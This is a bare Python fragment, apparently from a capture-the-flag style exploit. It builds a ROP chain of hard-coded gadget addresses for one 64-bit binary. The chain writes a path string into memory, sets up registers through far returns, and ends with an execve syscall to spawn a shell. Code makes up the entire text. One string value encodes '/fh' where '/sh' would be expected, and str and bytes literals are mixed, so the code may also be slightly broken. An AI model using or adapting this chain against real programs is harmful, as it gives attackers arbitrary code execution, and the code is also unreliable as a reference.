payload = p64(0x4011ad)
#0x00000000004011ad: pop rbp; ret; 
payload += p64(0x4a6095)+p64(0x48ee22)
# 0x000000000048ee22: pop rbx; ret; 
payload += p64(0x6e69622f)+p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x4a6099)+p64(0x48ee22)
# 0x000000000048ee22: pop rbx; ret; 
payload += p64(0x68662f)+p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x460b74)
# 0x460b74: pop rdi ; retf
payload += p64(0x4a6058)+p32(0x46dd16)+p32(0x33)
# 0x46dd16: pop rsi ; retf 2
payload += p64(0x0)+p32(0x48e53e)+p32(0x33)+"\x00"*2
# 0x000000000048e53e: xchg esi, eax; ret 0; 
payload += p64(0x43e853)
# 0x000000000043e853: xchg edx, eax; ret; 
payload += p64(0x46dd16)
# 0x46dd16: pop rsi ; retf 2
payload += p64(0x3b)+p32(0x48e53e)+p32(0x33)+"\x00"*2
# 0x000000000048e53e: xchg esi, eax; ret 0; 
payload += p64(0x46dd16)
# 0x46dd16: pop rsi ; retf 2
payload += p64(0x0)+p32(0x449e55)+p32(0x33)+"\x00"*2
# 0x0000000000449e55: syscall; 
payload += b''
